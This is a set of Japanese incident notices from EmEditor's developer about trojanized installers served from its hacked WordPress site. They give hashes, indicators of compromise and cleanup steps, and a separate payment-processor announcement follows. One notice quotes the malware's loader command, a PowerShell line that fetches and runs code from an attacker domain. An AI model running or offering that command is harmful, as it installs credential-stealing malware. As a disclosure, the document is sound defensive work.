Emurasoft logo

【重要】EmEditor ホームページに関する不正リンク(マルウェア)について(続報)

平素より EmEditor をご利用いただき、誠にありがとうございます。

既に X にてお知らせしております「【重要】EmEditor ホームページに関する不正リンク(マルウェア)について」 につきまして、その後の調査で判明した事項、および前回告知の補足を以下にご報告いたします。

注意点として、本件は、日本時間の2025年12月23日付で告知いたしました、前回のインシデント とは別件のインシデントであり、日本語版 EmEditor Web サイト(https://jp.emeditor.com/)のみが影響を受けています。他言語のサイトには影響はありません。

本件により、お客様には多大なるご心配とご迷惑をお掛けしておりますことを、重ねて深くお詫び申し上げます。


1. 影響が発生した可能性のある期間(日本時間/UTC)

  • 2025年12月31日 18:26 ~ 2026年1月2日 01:51(日本時間)
  • 2025-12-31 09:26 UTC ~ 2026-01-01 16:51(UTC)

※終了時刻は正確ですが、開始時刻はこれより遅い可能性があります。

上記期間中に、EmEditor ホームページ上の emed64_25.4.4.msi へのリンク(ダウンロード ページやブログ ページ)からインストーラーをダウンロードされた場合、弊社(Emurasoft, Inc.)が提供する正規ファイルではない別ファイルがダウンロードされた可能性があります。
なお、この期間は安全側に見積もって広めに設定しており、実際にはこれより短い、特定の時間帯のみであった可能性もあります。


2. 事象の概要

日本語版 EmEditor Web サイトでは、EmEditor デスクトップ インストーラー最新版のダウンロード先として、次の URL がリンクになっていました。

  • https://download.emeditor.info/emed64_25.4.4.msi

当該期間中、リンクをクリックすると以下のリンクに遷移するよう、第三者により改変されていました。

  • https://jp.emeditor.com/wp-content/uploads/2025/10/emed64_25.4.4.msi

その結果、マルウェアを含む問題のファイル emed64_25.4.4.msi がダウンロードされてしまう現象が発生しました。

当該ファイルは弊社が作成したものではなく、現在は削除済みです。

また、当該ファイルには弊社の署名ではなく、GRH PSYCHIC SERVICES LTD という別組織のデジタル署名が付与されていることを確認しています。


3. 影響が確認されているファイル

本件で問題となっているファイル emed64_25.4.4.msi について、付与されていた電子署名(デジタル署名)は、いずれも Microsoft から発行された署名でした。署名の有効期間が数日間と非常に短いことから、いわゆる開発者向けに近い形で発行された署名である可能性が高いと考えています。
弊社では Microsoft に対して問題のファイルを添付して本インシデントを報告し、当該デジタル署名の無効化を要求いたしました。

正しいファイル(弊社正規 EmEditor インストーラー)

  • ファイル名: emed64_25.4.4.msi
  • サイズ: 81,469,440 bytes
  • 電子署名(発行先): Emurasoft, Inc.
  • 電子署名(発行者): Sectigo Public Code Signing CA R36
  • 電子署名(有効期間): 2023/4/9 から 2026/4/9
  • SHA-256: 09e884896467b8fa574b2adf22d792e039774b8fb1300ec26a59c951937eaa3c
  • VirusTotal の検出結果:
    https://www.virustotal.com/gui/file/09e884896467b8fa574b2adf22d792e039774b8fb1300ec26a59c951937eaa3c
  • 配布元(正規): https://download.emeditor.info/emed64_25.4.4.msi

問題のあるファイル

  • ファイル名: emed64_25.4.4.msi
  • サイズ: 81,473,024 bytes
  • 電子署名(発行先): GRH PSYCHIC SERVICES LTD
  • 電子署名(発行者): Microsoft ID Verified CS EOC CA 02
  • 電子署名(有効期間): 2025/12/31 から 2026/1/3
  • SHA-256: da59acc764bbd6b576bef6b1b9038f592ad4df0eed894b0fbd3931f733622a1a
  • VirusTotal の検出結果:
    https://www.virustotal.com/gui/file/da59acc764bbd6b576bef6b1b9038f592ad4df0eed894b0fbd3931f733622a1a
  • 置かれていた場所: https://jp.emeditor.com/wp-content/uploads/2025/10/emed64_25.4.4.msi(削除済み)

4. 影響を受けないケース

以下の場合は 本件の影響を受けません

  • EmEditor の 更新チェッカー(Update Checker) から更新した場合、または EmEditor により自動更新が行われた場合(更新チェッカーは自動的に、デジタル署名の署名者が Emurasoft, Inc. と一致することを確認するため、問題は発生しません)
  • emed64_25.4.4.msi 以外のファイル (emed64_25.4.3.msi については前回のインシデントをご確認ください)
  • ポータブル版
  • ストア アプリ版
  • winget を利用してインストール/更新した場合
  • 問題のファイルをダウンロードしていたとしても、当該ファイルを実行していない場合
  • 日本語版 EmEditor Web サイト(https://jp.emeditor.com/)以外からダウンロードした場合

5. 該当する可能性がある場合の確認方法とお願い

上記期間中に日本語版 EmEditor Web サイト(https://jp.emeditor.com/)からインストーラーを入手された可能性がある場合は、ダウンロードした emed64_25.4.4.msiデジタル署名 および SHA-256 をご確認ください。
(可能であれば、インストール/実行の有無もあわせてご確認ください。)

5-1. デジタル署名の確認手順(Windows)

  1. 対象ファイル(emed64_25.4.4.msi)を右クリックし、[プロパティ] を開きます。
  2. [デジタル署名] タブを開きます。
  3. 署名者名(Signer/署名者)が Emurasoft, Inc. であることを確認してください。
  • GRH PSYCHIC SERVICES LTD となっている場合、問題のあるファイルの可能性があります。

※「デジタル署名」タブが表示されない場合、署名が付与されていない、または正しく認識できない可能性があります。その場合も当該ファイルは実行せず削除し、後述の対応をご検討ください。

5-2. SHA-256 の確認手順(Windows/PowerShell)

PowerShell を開き、次を実行してください。

Get-FileHash .\emed64_25.4.4.msi -Algorithm SHA256

出力された SHA-256 が次と一致することをご確認ください。

  • 正規ファイルの SHA-256: 09e884896467b8fa574b2adf22d792e039774b8fb1300ec26a59c951937eaa3c

署名または SHA-256 が一致しない場合(推奨対応)

デジタル署名が Emurasoft, Inc. ではなく GRH PSYCHIC SERVICES LTD となっている場合、または SHA-256 が一致しない場合、改ざんされたファイル(マルウェアを含む可能性のあるファイル)を入手された恐れがあります。

  • 直ちに当該コンピューターを ネットワークから切り離す(有線/無線の遮断)
  • コンピューター全体の マルウェア スキャン を実施する
  • 状況により、可能であれば OS を含む環境のリフレッシュ/再構築 をご検討ください
  • 当該端末で利用・保存していた情報が漏えいしている可能性も考慮し、各種サービスの パスワード変更(必要に応じて多要素認証の有効化)をご検討ください

※企業・組織でご利用の場合は、可能な範囲で 社内のセキュリティ担当部門(CSIRT 等) への連絡も推奨いたします。

5-3. ダウンロードしたファイルを既に削除してしまった場合の対処方法

すでにダウンロードしたファイルを削除してしまっている場合でも、Windows の仕様により、インストール時に参照された MSI が C:\Windows\Installer 配下に別名で残っていることがあります。

このフォルダは「隠しフォルダ」であると同時に、OS により保護されたフォルダでもあるため、ファイル エクスプローラー上で通常の操作だけでは見つけにくく、C:\Windows\Installer をパス指定して直接開く必要があります。

フォルダを開いた後は、以下の流れを推奨いたします。なお、この際、MSI ファイルをダブルクリックしたり実行したりしないよう、細心の注意を払ってください。

  1. 日付順(更新日時など)で並べ替え を行う
  2. 比較的新しいファイル を中心に確認する
  3. 対象ファイルの 電子署名(デジタル署名) を確認する(右クリック → プロパティ → デジタル署名)

5-4. コンピューターがマルウェアに感染したかどうかを判別する方法

問題のファイルを実行したとしても、次のような環境では必ずしも感染するとは限りません。

  • 端末がオフラインであった場合
  • VPN/プロキシ必須環境であった場合
  • Windows の機能/ポリシーにより PowerShell の不審な挙動がブロックされた場合
  • PowerShell の起動自体が制限されていた場合
  • アンチウイルス/セキュリティ ソフトウェアによりブロックされた場合

次のような条件が 1 つでも当てはまる場合、感染している可能性が非常に高くなります。

  • C:\ProgramData\tmp_mojo.log というファイルが存在する
  • Google Drive Caching という名前のタスクがスケジュールされている
  • %LOCALAPPDATA%\Google Drive Caching\ フォルダ内に background.vbs が存在する
  • Chrome、Microsoft Edge など Chromium ベースのブラウザに、Google Drive Caching という名前のブラウザ拡張機能が存在する(たとえ Google 製を名乗っていても)。特に、「すべてのウェブサイト上のデータの読み取りと変更」が可能で、さらにクリップボードにアクセスできる権限を持つ場合
  • ネットワーク ログを調べて、次のいずれかに接続された形跡がある:cachingdrive.comemeditorde.comemeditorgb.comemeditorjp.comemeditorsb.comemeditorltd.com

以上のすべての項目に当てはまらない場合、リスクは低くなりますが、ゼロではありません。攻撃の一部はファイルに痕跡を残さず、メモリ内で行われるためです。


6. 確認されている挙動

VirusTotal の検出結果により、emeditorltd.com へのアクセスが確認されています。

このドメイン(emeditorltd.com)は、弊社(Emurasoft, Inc.)が管理しているドメインではありません。インストーラーを実行したコンピューターがマルウェアに感染し、パスワード等の個人情報が窃取される可能性があります。発生の時期および手口から、前回のインシデントと同様のマルウェアである可能性が高いと考えられます。詳しくは、前回の続報 をご参照ください。


7. 問題の本質

前回の続報(同上)にて記載したとおり、残念ながら、私どもソフトウェア会社にとって 「正規インストーラーに酷似した悪意のあるインストーラーの作成・流通そのもの」を完全に防ぐことは困難です。しかしながら、前回と同様、今回の「本質的な問題」は大きく 2 点です。

  1. 私どもの Web サイトで利用されていたダウンロード用リンクが、気付かないうちに改変されてしまったこと
  2. 私どもの Web サイトに外部からアクセスされ、マルウェアを含む 問題のファイルが設置されてしまったこと

これらが重なったことで、「公式サイトからダウンロードしたお客様が被害に遭われた」という点に、私どもとして重い責任を感じております。防げなかったのか、という反省も含め、以後の対策につなげてまいります。

7-1. 詳細な事象(EmEditor ホームページにマルウェアを含む問題のファイルが置かれていた件)

マルウェアを含む問題のファイル emed64_25.4.4.msi が無断で設置されていました。また、テーマ用ファイルである functions.php が無断で改変されていたことが分かっています。
この functions.php にスクリプトが追加されており、EmEditor ホームページ(日本語)内の下記ファイルへのリンク(https://download.emeditor.info/emed64_25.4.4.msi)をユーザーがクリックした際に「横取り」し、当時、問題のあるインストーラーが置かれていた https://jp.emeditor.com/wp-content/uploads/2025/10/emed64_25.4.4.msi に遷移させるものでした。

結果として、ホームページ上のデスクトップ インストーラー emed64_25.4.4.msi へのリンクをクリックすると、問題のファイルがダウンロードされる状態になっていたことが分かりました。

さらに悪質な点として、このスクリプトは 未ログインの一般訪問者にのみ動作 するようになっており、管理者側で確認しても気付きにくい(再現しにくい)状態になっていました。


8. 問題の原因

前回の続報(同上)で書いたのと同様、WordPress の脆弱性が狙われた可能性、または SFTP アカウントが攻撃対象になった可能性が考えられます。


9. 弊社の対応(実施済み/今後)

弊社ではまず、問題のファイル emed64_25.4.4.msi を削除し、直ちに一時的にすべてのサイトを閉鎖しました。

そして、公式サイトを閉鎖したため、X および Facebook を利用して本インシデントの第一報を告知いたしました。

以前の定期バックアップからファイルの変更を調査し、functions.php の改変を確認しました。

しかしながら、X や Facebook のサイトをご存じないお客様のため、サイトを再構築し、すべてのプラグインを再インストールして問題がないことを確認したうえで、サイトを一時的に再公開し、ホームページ最上部に本インシデントについての X での告知へのリンクを掲載しました。

それでも攻撃者により Web ページを書き換えられる危険性が残るため、WordPress の使用を中止し、従来の内容をすべて HTML にエクスポートして、Web サイトを静的サイトに変更しました。現在表示されている英語版と日本語版の EmEditor サイトは、すべて WordPress を使用しない静的サイトとなっているため、安全と言えます。英語および日本語のサイトについては、マルウェアの発見から 2 日以内に静的サイトへ移行することができました。他の言語のサイトも近日中に移行する予定です。


10. 最後に

前回(同上)にも書いたように、マルウェアにより改変されたインストーラーは、実行されると非常に危険な挙動を取り得ます。しかしながら、私どもには「悪意あるインストーラーの作成・配布」そのものを根本的に阻止する手段がないのが実情です。

そのため、私どもができる最大のことは、第1配布元として、弊社 Web サイトからマルウェアが入手されないよう防御し続けることであると考えています。

今回使用されたドメイン(emeditorltd.com)は、前回のインシデントで用いられた emeditorde.comemeditorgb.comemeditorjp.comemeditorsb.com とは異なるドメインでした。公式サイトである emeditor.com に似た名前のドメインが攻撃者により多数所有されていたこと、マルウェアが非常に精巧に作られている点、そして繰り返し攻撃を加えている事実に加え、クリスマス前の週末や正月に攻撃されたことから、攻撃者の高い執念が感じられます。
このままでは再び同様の攻撃が行われても不思議ではないため、WordPress という動的サイトから、HTML/CSS/JS ベースの静的サイトへ移行することを決定し、実行しました。

幸いなことに、エムソフト カスタマー センター は攻撃を受けておらず、当社のデータベースも安全でした。お客様データベースがアクセスされた証拠は確認されていません。

前述のとおり、WordPress による動的サイトから、HTML/CSS/JS ベースの静的サイトに移行できたことで、今後、 同様のインシデントが発生する可能性は極めて低くなる見込みです。 これに伴い、フォーラムは、閲覧専用(読み取り専用)になり、新規メンバーの登録は終了しました。何卒、ご了承ください。

本インシデントによる経験が、少しでも他のソフトウェア会社の皆様のお役に立てばという思いから、単なるご報告に留まらず、可能な限りの詳細と考察を記載いたしました。

このたびは、皆様に多大なるご迷惑とご心配をお掛けしましたことを、重ねてお詫び申し上げます。特に、感染の被害に遭われた方々にはご迷惑をお掛けしましたことを深くお詫び申し上げます。

今後とも EmEditor をよろしくお願い申し上げます。

Emurasoft logo

【重要】EmEditor インストーラーのダウンロード導線に関するセキュリティ インシデントのお知らせ(続報)

平素より EmEditor をご利用いただき、誠にありがとうございます。
すでにお知らせしております「【重要】EmEditor インストーラーのダウンロード導線に関するセキュリティ インシデントのお知らせ」 につきまして、その後の調査で判明した事項、および前回告知の補足を以下にご報告いたします。

本件により、お客様には多大なるご心配とご迷惑をお掛けしておりますことを、重ねて深くお詫び申し上げます。


1. 影響が発生した可能性のある期間(日本時間/UTC)

前回のお知らせでは日本時間(JST)でご案内いたしましたが、補足として世界標準時(UTC)も併記いたします。

  • 2025年12月20日 11:39 〜 2025年12月23日 05:50(日本時間)
  • 2025-12-20 02:39 – 2025-12-22 20:50(UTC)

上記期間中に、EmEditor ホームページ上のダウンロード導線(例:「今すぐダウンロード」ボタン等)からインストーラーを入手された場合、弊社(Emurasoft, Inc.)が提供する正規ファイルではない別ファイルがダウンロードされた可能性があります。
なお、この期間は安全側に見積もって広めに設定しており、実際にはこれよりも短い、特定の時間帯のみであった可能性もあります。


2. 問題のファイルについて(確認できている差分)

本件で問題となっているファイル emed64_25.4.3.msi について、少なくとも 2つの「問題のあるファイル」 が存在することを確認しています。

また、問題のあるファイルに付与されていた電子署名(デジタル署名)は、いずれも Microsoft から発行された署名でした。署名の有効期間が数日間と非常に短いことから、いわゆる開発者向けに近い形で発行された署名である可能性が高いと考えています。
弊社では、Microsoft に対して問題のファイルを添付して本インシデントを報告し、当該デジタル署名の無効化を要求いたしました。現在では、これら両方のデジタル署名がすでに無効化されていることを確認しており、当該 MSI を実行しようとすると、デジタル署名が無効である旨の警告メッセージが表示され、容易にはインストールできない状態になっています。

正しいファイル(弊社正規 EmEditor インストーラー)

問題のあるファイル その1

問題のあるファイル その2


3. ダウンロードしたファイルを既に削除してしまった場合の対処方法

ダウンロードしたファイル(emed64_25.4.3.msi)が手元に残っている場合は、前回もお知らせしましたとおり、デジタル署名または SHA-256 により確認できます。

一方で、すでにダウンロードしたファイルを削除してしまっている場合でも、Windows の仕様により、インストール時に参照された MSI が C:\Windows\Installer 配下に別名で残っていることがあります。

このフォルダは「隠しフォルダ」であると同時に、OS により保護されたフォルダでもあるため、ファイル エクスプローラー上で通常の操作だけでは見つけにくく、C:\Windows\Installer をパス指定して直接開く必要があります。

フォルダを開いた後は、以下の流れを推奨いたします。なお、この際、MSI ファイルをダブルクリックしたり実行したりしないよう、細心の注意を払ってください。

  1. 日付順(更新日時など)で並べ替えを行う
  2. 比較的新しいファイルを中心に確認する
  3. 対象ファイルの 電子署名(デジタル署名) を確認する(右クリック → プロパティ → デジタル署名)

4. コンピューターがマルウェアに感染したかどうかを判別する方法

問題のファイルを実行したとしても、次のような環境では必ずしも感染するとは限りません。

  • 端末がオフラインであった場合
  • VPN/プロキシ必須環境であった場合
  • Windows の機能/ポリシーにより PowerShell の不審な挙動がブロックされた場合
  • PowerShell の起動自体が制限されていた場合
  • アンチウイルス/セキュリティ ソフトウェアによりブロックされた場合

次のような条件が 1 つでも当てはまる場合、感染している可能性が非常に高くなります。

  • C:\ProgramData\tmp_mojo.log というファイルが存在する
  • Google Drive Caching という名前のタスクがスケジュールされている
  • %LOCALAPPDATA%\Google Drive Caching\ フォルダ内に background.vbs が存在する
  • Chrome、Microsoft Edge など Chromium ベースのブラウザに、Google Drive Caching という名前のブラウザ拡張機能が存在する(たとえ Google 製を名乗っていても)。特に、「すべてのウェブサイト上のデータの読み取りと変更」が可能で、さらにクリップボードにアクセスできる権限を持つ場合
  • ネットワーク ログを調べて、次のいずれかに接続された形跡がある: cachingdrive.comemeditorde.comemeditorgb.comemeditorjp.comemeditorsb.com

以上のすべての項目に当てはまらない場合、リスクは低くなりますが、ゼロではありません。攻撃の一部はファイルに痕跡を残さず、メモリ内で行われるためです。


5. 確認されている挙動(アクセス先ドメイン等)

前回お知らせしたとおり、問題のインストーラーは、実行時に 外部ドメインからファイルを取得して実行する挙動を示すことが分かっています。前回の告知では emeditorjp.com へのアクセスを確認していましたが、その後の調査により、emeditorjp.com だけでなく emeditorde.comemeditorgb.comemeditorsb.com にもアクセスしていることが分かりました。

これら 4 つのドメイン(emeditorjp.comemeditorde.comemeditorgb.comemeditorsb.com)は、いずれも弊社(Emurasoft, Inc.)が管理しているドメインではありません。

また、前回お知らせした PowerShell コマンドは外部ドメインからファイルを取得して実行するものであり、これにより、インストーラーを実行したコンピューターがマルウェアに感染し、パスワード等の個人情報が窃取される可能性があることを確認しています。

詳細については、Luca Palermo 氏および Mario Ciccarelli 氏によりまとめられた研究レポートをご参照ください。本レポートは Luca Palermo 氏からご提供いただいたものであり、掲載の許可もいただいております。この場を借りて、ご厚意に感謝申し上げます。


6. 問題の本質(なぜ「見分けにくい」のか)

まず前提として、ドメインデジタル署名は、一定の条件を満たせば第三者でも取得できてしまう、という現実があります。

  • ドメインは、未使用・未更新等で残っていれば、誰でも比較的安価に購入できる可能性があります。
  • デジタル署名(コードサイニング証明書)は、今回は発行者が Microsoft でしたが、一般に多くの認証局で取得が可能です。
  • 問題が発覚した後にできることは、基本的に「認証局等へ連絡し、当該署名の無効化を依頼する」ことに限られます。

さらに技術的な側面として、MSI インストーラーはカスタム アクション機能を利用することで、任意の PowerShell スクリプト等を含めることができてしまいます。したがって、ある程度の知識があれば、今回のように「流通しているインストーラーに似せたもの」に マルウェア ローダーを混入させることが可能です。
また、MSI ではなく EXE の実行型インストーラーであったとしても、PowerShell スクリプト等を含めること自体は容易であり、同様の攻撃が成立し得ます。

つまり、残念ながら、私どもソフトウェア会社にとって 「正規インストーラーに酷似した悪意のあるインストーラーの作成・流通そのもの」を完全に防ぐことは困難です。
不本意ながら、今後も非常に複雑かつ精巧な多段階型の PowerShell マルウェア ローダーを含むインストーラーが作成され得る、という点は現実として認識せざるを得ません。

その上で、今回の「本質的な問題」は大きく 2 点です。

  1. 私どもの Web サイトで利用されていた、ダウンロードに便利な リダイレクト(導線) が、気付かないうちに改変されてしまったこと
  2. 私どもの Web サイトに外部からアクセスされ、マルウェアを含む 問題のファイルが設置されてしまったこと

これらが重なったことで、「公式サイトからダウンロードしたお客様が被害に遭われた」という点に、私どもとして重い責任を感じております。防げなかったのか、という反省も含め、以後の対策に繋げてまいります。

6-1. EmEditor ホームページにマルウェアを含む問題のファイルが置かれていた件

マルウェアを含む問題のファイル emed64_25.4.3.msi 以外に、base64.php という別ファイルが、弊社 Web サイトのプラグインのディレクトリに設置されていたことが分かっています。この base64.php の内容を解析したところ、典型的なバックドア(遠隔コード実行/RCE)であることが判明しました。

さらに、WordPress テーマ用ディレクトリに以前から含まれていた footer.php にスクリプトが追加されていました。このスクリプトは、本来の URL であった https://support.emeditor.com/ja/downloads/latest/installer/64 へのユーザーのクリックを「横取り」し、当時、問題のあるインストーラーが置かれていた https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi に遷移させるものでした。

結果として、ホームページ上の「今すぐダウンロード」ボタンを押すと、問題のファイルがダウンロードされる状態になっていたことが分かりました。
さらに悪質な点として、このスクリプトは 未ログインの一般訪問者にのみ動作するようになっており、管理者側で確認しても気付きにくい(再現しにくい)状態になっていました。そのため、私自身が確認した際にも、リダイレクトが改変されていたことにすぐ気付けませんでした。


7. 問題の原因(現時点の見立て)

原因については現在も調査中であり、結論には至っていません。しかし、可能性としては次の点が考えられます。

WordPress は、本体、プラグイン、テーマ等の複数のパーツから成り立っており、多くの開発者が提供しています。これらのパーツには脆弱性が発見されることも多く、その都度、更新が提供されます。
私どもは平素よりプラグインやテーマの更新を行っていますが、脆弱性が発見されてから長期間にわたり、開発者による更新が提供されないこともあり、脆弱性が残存してしまう場合があります。今回の攻撃は、そのような脆弱性が狙われた可能性が否定できません。
さらに、使用していた SFTP アカウントが攻撃対象となった可能性も否定できません。


8. 弊社の対応(実施済み/今後)

弊社ではまず、問題のファイル emed64_25.4.3.msi を削除いたしました。加えてファイルの変更ログを調査し、base64.php の追加および footer.php の改変を確認しました。base64.php が典型的なバックドアであることを確認したため、全サイトのスキャンを実施しました。

その後、サイトを再構築し、すべてのプラグインを再インストールするとともに、不要なプラグインは使用しない方針といたしました。さらに、社内で使用しているコンピューターのスキャン、および全 WordPress サイトならびに関連サイトのログイン パスワード変更も実施しました。

また、従来「今すぐダウンロード」ボタン等で利用していたリンクについては、リダイレクトの使用を中止し、すべて安全なファイルへの直接リンクに置き換えました。ダウンロード ページでは MSI の SHA-256 を明記するとともに、デジタル署名を確認するよう説明を追加しています。

そして、EmEditor ホームページのダウンロード導線をより強固にするため、近い将来、EmEditor のホームページを WordPress とは異なる別のカスタム/静的ホームページへ移行することも検討しております。


9. 最後に

以上のとおり、マルウェアにより改変されたインストーラーは、実行されると非常に危険な挙動を取り得ます。しかしながら、私どもには「悪意あるインストーラーの作成・配布」そのものを根本的に阻止する手段がないのが実情です。

そのため、私どもができる最大のことは、第1配布先として、弊社 Web サイトからマルウェアが入手されないよう防御し続けることであると考えています。

また、Xoops や WordPress などの人気の高い CMS(コンテンツ・マネジメント・システム)は使い勝手が良い反面、拡張性が高いがゆえに脆弱性が見つかることも多く、単にプラグインやテーマの更新だけでは脆弱性を完全に拭い切れない、と今回あらためて感じました。

不幸中の幸いにも、エムソフト カスタマー センターは攻撃を受けておらず、当社のデータベースも安全でした。お客様データベースがアクセスされた証拠は確認されていません。

本インシデントによる経験が、少しでも他のソフトウェア会社の皆様のお役に立てばという思いから、単なるご報告に留まらず、可能な限りの詳細と考察を記載いたしました。

このたびは、皆様に多大なるご迷惑とご心配をお掛けしましたことを、重ねてお詫び申し上げます。特に、感染の被害に遭われた方々にはご迷惑をお掛けしましたことを深くお詫び申し上げます。

今後とも EmEditor をよろしくお願い申し上げます。

Emurasoft logo

【重要】EmEditor インストーラーのダウンロード導線に関するセキュリティ インシデントのお知らせ

平素より EmEditor をご利用いただき、誠にありがとうございます。

誠に遺憾ながら、EmEditor 公式サイトにおけるダウンロード導線(ホームページ上の [今すぐダウンロード] ボタン)に関し、第三者による改変が疑われる事象を確認いたしました。
該当期間中に当該ボタンからダウンロードされたインストーラーが、弊社(Emurasoft, Inc.)が提供する正規ファイルではない可能性があります。

お客様には多大なるご心配とご迷惑をお掛けしておりますことを、深くお詫び申し上げます。以下の内容をご確認ください。


1. 影響が発生した可能性のある期間

  • 2025年12月20日 11:39 〜 2025年12月23日 05:50 (日本時間)

上記期間中に、EmEditor ホームページ上の [今すぐダウンロード] ボタンからインストーラーをダウンロードされた場合、弊社のデジタル署名が付与されていない別ファイルがダウンロードされた可能性があります。これは広めに見積もっており、実際には、これよりも狭い特定の期間であった可能性があります。


2. 事象の概要(原因の概要)

ホームページの [今すぐダウンロード] ボタンのリンク先は通常、次の URL です。

  • https://support.emeditor.com/ja/downloads/latest/installer/64

この URL はリダイレクト(転送)設定になっていますが、当該期間中、リダイレクト設定が第三者により改変された疑いがあり、本来とは異なる URL である下記からファイルがダウンロードされる状態となっていました。

  • https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi

当該ファイルは弊社が作成したものではなく、現在は削除済みです。

その結果、ダウンロードされたファイルには弊社の署名ではなく、WALSHAM INVESTMENTS LIMITED という別組織のデジタル署名が付与されていることを確認しています。

※本件は日本語ページに限らず、以下のような他言語ページの同種 URL も影響を受ける可能性があります。

  • https://support.emeditor.com/en/downloads/latest/installer/64 (ほか)

3. 影響が確認されているファイル

現時点で影響が確認されているのは、次のファイルのみです。

  • emed64_25.4.3.msi

正しいファイル(弊社正規)

  • ファイル名: emed64_25.4.3.msi
  • サイズ: 80,376,832 bytes
  • デジタル署名: Emurasoft, Inc.
  • SHA-256: e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

問題のあるファイル(改ざんの可能性)

  • ファイル名: emed64_25.4.3.msi
  • サイズ: 80,380,416 bytes
  • デジタル署名: WALSHAM INVESTMENTS LIMITED

4. 影響を受けないケース

以下の場合は、本件の影響を受けません

  • EmEditor の 更新チェッカー(Update Checker) から更新した場合、または EmEditor により自動更新が行われた場合
  • download.emeditor.info から直接ダウンロードされた場合
    例: https://download.emeditor.info/emed64_25.4.3.msi
  • emed64_25.4.3.msi 以外のファイル
  • ポータブル版
  • ストア アプリ版
  • winget を利用してインストール/更新した場合
  • 問題のファイルをダウンロードしていたとしても、当該ファイルを実行していない場合

5. 該当する可能性がある場合の確認方法とお願い

上記期間中に [今すぐダウンロード] からインストーラーを入手された可能性がある場合は、ダウンロードした emed64_25.4.3.msiデジタル署名および SHA-256 をご確認ください。
(可能であれば、インストール/実行の有無もあわせてご確認ください。)

5-1. デジタル署名の確認手順(Windows)

  1. 対象ファイル(emed64_25.4.3.msi)を右クリックし、[プロパティ] を開きます。
  2. [デジタル署名] タブを開きます。
  3. 署名者名(Signer / 署名者)が Emurasoft, Inc. であることを確認してください。
  • WALSHAM INVESTMENTS LIMITED となっている場合、問題のあるファイルの可能性があります。

※「デジタル署名」タブが表示されない場合、署名が付与されていない、または正しく認識できない可能性があります。その場合も、当該ファイルは実行せず削除し、後述の対応をご検討ください。

5-2. SHA-256 の確認手順(Windows / PowerShell)

PowerShell を開き、次を実行してください。

Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256

出力された SHA-256 が次と一致することをご確認ください。

  • 正規ファイルの SHA-256:
    e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

署名または SHA-256 が一致しない場合(推奨対応)

デジタル署名が Emurasoft, Inc. ではなく WALSHAM INVESTMENTS LIMITED となっている場合、または SHA-256 が一致しない場合、改ざんされたファイル(マルウェアを含む可能性のあるファイル)を入手された恐れがあります。

  • 直ちに当該コンピューターを ネットワークから切り離す(有線/無線の遮断)
  • コンピューター全体の マルウェア スキャンを実施する
  • 状況により、可能であれば OS を含む環境のリフレッシュ/再構築をご検討ください
  • 当該端末で利用・保存していた情報が漏えいしている可能性も考慮し、各種サービスの パスワード変更(必要に応じて多要素認証の有効化)をご検討ください

※企業・組織でご利用の場合は、可能な範囲で 社内のセキュリティ担当部門(CSIRT 等)への連絡も推奨いたします。


6. 現時点で確認されている挙動について

本件で問題となる可能性のあるインストーラーは、実行時に次のコマンドを実行しようとします。危険ですので、このコマンドは絶対に実行しないでください。

  • powershell.exe "irm emeditorjp.com | iex"

このコマンドは emeditorjp.com からファイルを取得して実行するものです。
emeditorjp.com は弊社が管理するドメインではありません。

また、当該インストーラーは EmEditor 本体のインストール自体は正常に進み、正規の EmEditor ファイルがインストールされるため、問題に気付きにくい可能性があります。


7. 現在の対応状況と今後のご報告

現在、事実関係の確認および影響範囲の調査を継続しております。進展があり次第、本ページ等にて速やかにご報告いたします。
弊社では本事象を厳粛に受け止め、原因究明と再発防止に向けて必要な対策を講じてまいります。

このたびは、皆様に多大なるご迷惑とご心配をお掛けしましたことを、重ねて深くお詫び申し上げます。
今後とも EmEditor をよろしくお願い申し上げます。

EmEditorの支払い処理システムの更新

EmEditorが主要な支払い処理プロセッサとしてStripeに移行することを発表できることを嬉しく思います。この変更は、購入体験を向上させると同時に、最高のセキュリティとプライバシー基準を維持するという私共のコミットメントを反映しています。

変更点

  • 支払い処理プロセッサ: EmEditorのサブスクリプション購入の新しい支払い処理プロセッサはStripeになります。
  • 展開計画: 英語版ウェブサイト (emeditor.com) の「今すぐ購入」リンクをStripeの支払いページに変更しました。他の言語(日本語を含む)の「今すぐ購入」リンクは2025年1月に変更されます。
  • 現在のサブスクリプション: 既存の2Checkoutサブスクリプションはそのまま有効です。2Checkoutを希望されるお客様は引き続きこのリンクをご利用いただけます。
  • その他の販売業者: この変更は、EmEditorの他の販売業者には影響しません。
  • 登録プロセスの更新: Stripeサブスクリプションでは登録キーを使用しなくなります。その代わりに、エムソフト カスタマー センターの資格情報を使用してサインインすることができます。2Checkoutサブスクリプションでは引き続き登録キーが提供されます。

Stripeを選んだ理由

支払いオプションの改善

Stripeは、クレジットカードやデビットカード、銀行振込、Apple Pay、Google Payなど、幅広い支払い方法をサポートしています。

Stripeは、支払い情報を保存して迅速なチェックアウトを可能にする安全な自動入力機能Linkをサポートしています。

ユーザーフレンドリーな体験

Stripeを使用すると、迅速で直感的なチェックアウトプロセスを楽しむことができます。Stripeポータルを使用して、サブスクリプションを便利に管理できます。

セキュリティとプライバシー

セキュリティは常に私共の最優先事項です。Stripeは、PCI DSS準拠の厳格なポリシーと高度な暗号化を使用して、顧客の支払いデータを保護します。

Stripeを使用して購入する方法

サブスクリプションの購入

2025年1月から、jp.emeditor.comにアクセスして「今すぐ購入」をクリックすることでサブスクリプションを購入できます。エムソフト カスタマー センターにログインしている場合、Stripe支払いページに表示されるメールアドレスで正しいユーザーにリンクされることを確認できます。新しいユーザー用に購入する場合は、カスタマーセンターからサインアウトし、支払いページで希望のメールアドレスを手動で入力してください。

画面左半分の「Qty」ボタンをクリックしてサブスクリプションの数量を変更できます。

サブスクリプション詳細を含むメール

購入後数分以内に、emurasoft.comから2つのメールが届きます:1つはサブスクリプション詳細を含むもの、もう1つは領収書です。

EmEditorの登録

サブスクリプションを購入した後は、EmEditorにサインインすることで登録できます。

  1. EmEditorを開きます。
  2. ヘルプ > 登録情報… に移動します。
  3. サインイン/登録情報を入力 をクリックします。
  4. 新しいサブスクリプションで登録するには、エムソフト カスタマー センターの資格情報でサインインします。
  5. 登録情報にて、サブスクリプションIDが表示され、下に「認証成功」が表示されていることを確認します。

オフライン登録

